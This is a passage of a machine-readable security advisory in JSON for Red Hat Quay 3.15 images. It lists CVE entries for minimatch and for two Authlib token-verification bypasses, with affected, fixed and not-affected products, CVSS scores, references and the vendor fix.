"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-28498",
"cwe": {
"id": "CWE-325",
"name": "Missing Cryptographic Step"
},
"discovery_date": "2026-03-16T19:02:00.128339+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448182"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library\u0027s internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Authlib allows attackers to bypass OIDC ID Token integrity verification. The at_hash and c_hash validation fails open for unknown algorithms, accepting forged tokens as valid. Exploitation requires no authentication or user interaction. Impact is high to confidentiality and integrity. Red Hat products using Authlib for OIDC validation are affected. Fixed in version 1.6.9.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "RHBZ#2448182",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448182"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28498",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28498"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b",
"url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j"
}
],
"release_date": "2026-03-16T18:03:28.821000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
